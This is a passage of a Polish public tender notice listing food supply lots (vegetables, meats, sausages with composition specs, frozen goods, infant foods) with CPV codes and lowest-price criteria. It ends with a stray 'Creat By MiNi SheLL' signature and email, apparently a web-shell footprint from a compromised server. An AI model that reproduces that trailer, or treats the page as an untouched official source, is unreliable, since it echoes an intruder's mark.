<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jogurt naturalny b/c,	120 - 150g,	szt.	800;   
2.	Masło roślinne kostka (mix),	200-250g, 	szt.	5 500;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ziemniaki, kg	24 000;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET NR 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Marchew, kg	4 500;   
2.	Pietruszka, kg	80;   
3.	Seler, kg	1 500;   
4.	Por, szt.	250;   
5.	Burak, Kg	2 700;   
6.	Botwina	w sezonie, szt.	100;   
7.	Kapusta biała, kg	1 800;   
8.	Kapusta młoda, szt.	350;   
9.	Kapusta pekińska, kg	400;   
10.	Kapusta czerwona, Kg	150;   
11.	Kapusta kwaszona, Kg	700;   
12.	Włoszczyzna, Pęczek,	szt.	1 500;  
13.	Cebula, kg	650;   
14.	Pieczarka, kg	500;   
15.	Jabłka średniej wielkości, kg	2 500;   
16.	Ogórek zielony, kg	150;   
17.	Ogórek kiszony, kg	900;   
18.	Pomidory	w sezonie (V-X),	kg	400;  
19.	Pomidory	poza sezonem (XI-IV),	kg	350;   
20.	Ogórek zielony - sałatkowy	w sezonie,	kg	70;   
21.	Koperek	Pęczek,	szt.	1 200;   
22.	Natka pietruszki	Pęczek,	szt.	550;   
23.	Sałata 	min. 0,20 kg,	szt.	2 500;   
24.	Kalafior	min 1,30 kg,	szt.	600;   
25.	Groch łupany, kg	50;   
26.	Czosnek, szt.	20;   
27.	Papryka, 	kg	260;   
28.	Szczypior	, szt.	200;   
29.	Brokuły	min. 500g, szt.	50;   
30.	Fasolka szparagowa	w sezonie,	kg	30;   
31.	Brukselka	w sezonie, 	kg	20;   
32.	Truskawka w sezonie, 	kg	40;   
33.	Mandarynki, 	kg	20;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET NR 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wieprzowina gulaszowa, kg	2 100;   
2.	Wołowina gulaszowa, kg	200;   
3.	III Wołowa, kg	200;   
4.	Wieprzowina tłusta, kg	550;   
5.	Łopatka b/k, kg	200;   
6.	Kości rozbiorowe ze schabu i karczku, 	kg	50;   
7.	Kości wędzone, 	kg	50;   
8.	Schab b /k, kg	900;   
9.	Żeberka (cienkie paski, nie odmięśnione), kg	200;   
10.	Słonina, 	kg	100;   
11.	Wątroba wieprzowa, kg	400;   
12.	Karczek b/k, kg	400;   
13.	Od szynki, kg	500;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET NR 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Udziec z kurczaka, kg	1 000;   
2.	Pałka z kurczaka, 	kg	500;   
3.	Ćwiartka kurczaka,	0,45kg,	kg	1 000;   
4.	Filet z kurczaka, 	kg	650;   
5.	Porcje rosołowe, 	kg	800;   
6.	Kurczak, 	kg	150;   
7.	Żołądki drobiowe, 	kg	50;   
8.	Wątróbki drobiowe, kg	250;   
9.	Mięso  drobiowe  mielone, 	kg	50;   
10.	Wędlina drobiowa gruba, parzona, kg	100;   
11.	Wędlina drobiowa gruba, kg	170;   
12.	Pasztet drobiowy, 	kg	60;   
13.	Parówka drobiowa cienka - paluszek, kg	100;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.13.15.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET NR 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	KIEŁBASA KRAKOWSKA lub równoważna- wędlina grubo rozdrobniona wędzona parzona, zawartość mięsa wieprzowego min. 68%. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego oraz użytych przypraw i dodatków,		kg	550;
2.	KIEŁBASA SZYNKOWA lub równoważna- wędlina grubo rozdrobniona wędzona parzona, zawartość mięsa wieprzowego min. 69%. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego oraz użytych przypraw i dodatków,		kg	460;
3.	KIEŁBASA ZIELONOGÓRSKA lub równoważna- wędlina grubo rozdrobniona parzona, zawartość mięsa wieprzowego min. 69%. Smak i zapach charakterystyczny dla kiełbasy parzonej oraz użytych przypraw i dodatków,		kg	200;
4.	KIEŁBASA RAWSKA lub równoważna- wędlina grubo rozdrobniona parzona, zawartość mięsa wieprzowego min. 69%. Smak i zapach charakterystyczny dla kiełbasy parzonej z mięsa wieprzowego oraz użytych przypraw i dodatków,		kg	480;
5.	KIEŁBASA PIWNA lub równoważna- wędlina średnio rozdrobniona wędzona parzona z dodatkiem czosnku, zawartość mięsa wieprzowego min. 43% i mięsa wołowego min. 8%. Smak i zapach charakterystyczny dla kiełbasy wędzonej parzonej z mięsa wieprzowego i wołowego oraz użytych przypraw i dodatków,		kg	480;
6.	KIEŁBASA ŁOPATKOWA lub równoważna- wędlina grubo rozdrobniona parzona, zawartość mięsa wieprzowego min. 69%. Smak i zapach charakterystyczny dla kiełbasy parzonej z mięsa wieprzowego oraz użytych przypraw i dodatków,		kg	360;
7.	KIEŁBASA DĘBICKA lub równoważna- wędlina grubo rozdrobniona parzona, zawartość mięsa wieprzowego min. 69%. Smak i zapach charakterystyczny dla kiełbasy parzonej z mięsa wieprzowego oraz użytych przypraw i dodatków,		kg	270;
8.	KIEŁBASA DOMOWA lub równoważna- wędlina średnio rozdrobniona wędzona parzona z dodatkiem czosnku, zawartość mięsa wieprzowego min. 26% oraz mięsa wołowego min. 18%. Batony w jelitach wieprzowych cienkich, odkręcane w odcinki - krótkie. Powierzchnia batonu od jasnobrązowej do ciemnobrązowej, osłonka pomarszczona. Na przekroju surowce równomiernie rozłożone. Barwa na przekroju charakterystyczna dla użytych surowców peklowanych; mięsa od bladoróżowej do ciemnoczerwonej; tłuszczu od kremowej do białej. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego i wołowego oraz użytych przypraw. Pętka do 100 g., 		kg	200;
9.	KIEŁBASA ZWYCZAJNA lub równoważna- wędlina cienka, średnio rozdrobniona wędzona parzona z dodatkiem czosnku i majeranku, zawartość mięsa wieprzowego min. 40% oraz mięsa wołowego min. 19%. Smak i zapach charakterystyczny dla kiełbasy wędzonej parzonej z mięsa wieprzowego i wołowego oraz użytych przypraw i dodatków,		kg	200;
10.	Pachwina wędzona,		kg	60;
11.	PARÓWKA PALUSZEK, kiełbasa drobno rozdrobniona wędzona parzona o zawartości mięsa wieprzowego min. 36% oraz mięsa wołowego min. 5%,		kg	450;
12.	PIECZEŃ RZYMSKA - zawartość mięsa wieprzowego min. 40% oraz mięsa wołowego min. 17%. Produkt blokowy pieczony z dodatkiem kaszy manny,		kg	180;
13.	PIECZEŃ WIEPRZOWA - bloczek drobno rozdrobniony parzony o zawartości mięsa wieprzowego min. 36%,		kg	140;
14.	Kaszanka,		kg	170;
15.	SZYNKA KONSERWOWA - zawartość mięsa wieprzowego min. 78%,		kg	220;
16.	MORTADELA - kiełbasa drobno rozdrobniona wędzona parzona z dodatkiem czosnku i gałki muszkatołowej, zawartość mięsa wieprzowego min. 35% oraz mięsa wołowego min. 4%, 		kg	50;
17.	PASZTET WIEPRZOWY W FOREMCE- wyrób podrobowy parzony, zawartość mięsa wieprzowego min. 43% i wątroby wieprzowej min. 15%,		kg	200;
18.	SALCESON - wyrób podrobowy parzony z dodatkiem czosnku, zawartość mięsa wieprzowego min. 55% oraz podroby wieprzowe min. 15%,		kg	100;
19.	KIEŁBASA BIAŁA PARZONA - kiełbasa średnio rozdrobniona z dodatkiem czosnku i majeranku, zawartość mięsa wieprzowego min. 48% oraz mięsa wołowego min. 19%,		kg	20;
20.	KIEŁBASA OGONÓWKA lub równoważna- wędzonka wieprzowa parzona, zawartość mięsa wieprzowego min. 70%. Wędzonka otrzymana z części szynki wieprzowej peklowanej bez kości, wędzona, parzona. Wędzonka osznurowana wzdłuż i w poprzek; barwa mięsa różowa do blado czerwonej, barwa tłuszczu biała do jasno żółtej, częściowo pokryta warstewką tłuszczu,		kg	30;
21.	SZYNKA WĘDZONA - wędzonka parzona, zawartość mięsa wieprzowego min. 70%. Smak i zapach charakterystyczny dla wędliny wędzonej parzonej z mięsa wieprzowego oraz użytych przypraw i dodatków,		kg	20; Należy dostarczyć opisy, foldery, katalogi w języku polskim potwierdzające wymagane parametry zawarte w Pakiecie nr 10..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET NR 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filet mrożony z ryby,  mintaj	25% glazury,	kg	250;
2.	Mrożona miruna, 	kg	450;
3.	Truskawka mrożona,	kg	120;
4.	Brokuł mrożony,	kg	120;
5.	Fasolka zielona - mrożona (cięta), kg	50;
6.	Kalafior mrożony, kg	400;
7.	Mieszanka warzywna 6 - składnikowa, kg	200;
8.	Płaty śledziowe - solone, kg	50;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET NR 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kleik ryżowy przeznaczony dla dzieci powyżej 4 miesiąca życia zawierający witaminę B1, 160g	szt. 	100;
2. Kleik kukurydziany przeznaczony dla dzieci powyżej 4 miesiąca życia zawierający witaminę B1, 160g	szt. 	40;
3.	Sok przecierowy owocowo- warzywny zawierający dodatek witaminy C oraz błonnik pokarmowy - przeznaczony dla dzieci powyżej 6 miesiąca życia 	175ml,	szt. 	200;
4.	Deser owocowy wzbogacony witaminą C, 	130g,	szt.	120;
5.	Deser owocowy nie zawierający mleka ani masła dla dzieci mających alergię pokarmową, 	190-200g, 	szt.	60;
6.	Mus z owoców przeznaczony dla niemowląt, które ukończyły 6 miesiąc życia, wzbogacony witaminą C lub jogurcik z owocami (z truskawką, gruszką, maliną lub jagodą) dla niemowląt, które ukończyły 6 miesiąc życia,	4x100g,	opakowanie	18;
7.	Kaszka mleczna z owocami,	230g,	szt.	60;
8.	Kaszka bezmleczna z owocami,	180g,	szt.	60;
9.	Kaszka mleczna do picia,	2x250ml,	opakowań	30;
10.	Zupka jarzynowa dla niemowląt powyżej 4 miesiąca życia,	130g,	szt.	150;
11.	Zupka jarzynowa z mięsem dla niemowląt powyżej 5 miesiąca życia,	130g,	szt.	150;
12.	Bezglutenowy i bezlaktozowy produkt zbożowy z ryżu i mąki z chleba świętojańskiego z witaminami i składanikami mineralnymi bez zawartości białka krowiego i białka sojowego. Produkt do stosowania przy alergii na białko mleka krowiego, profilaktyce alergii, diecie bezglutenowej, nietolerancji laktozy i niedoborach masy ciała. Do stosowania u niemowląt powyżej 4 miesiąca życia,	500g,	szt.	10;
13.	Hydrolizat serwatki o znacznym stopniu hydrolizy w płynie. Zawiera min. 66 kcal/100ml, błonnik pokarmowy (0,8g/100 ml), białko (równoważnik białka 1,6g/100 ml), Laktozę (2,9g/100 ml), 	90-100 ml,	szt.	48;
14.	Mleko modyfikowane początkowe dla niemowląt (od urodzenia do 6 miesiaca życia) gotowe do spożycia o zawartości: serwatka/kazeina 70/30,	90 ml,	szt.	450;
15.	Mleko modyfikowane początkowe dla niemowląt gotowe do spożycia o zawartości: serwatka/kazeina 70/30,	60ml,	szt.	100;
16.	Kompletna pod względem odżywczym, wysokoenergetyczna dieta dla dzieci powyżej 1 roku życia, kaloryczność 1,5 kcal./ml. Skład dostosowany do potrzeb dzieci. Odpowiednia do stosowania jako jedyne źródło pożywienia bądź uzupełnienia codziennej diety,	4x200 ml,	opakowanie	20;
Należy dostarczyć opisy, foldery, katalogi w języku polskim potwierdzające wymagane parametry zawarte w Pakiecie nr 12..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.88.20.00-4, 15.88.40.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com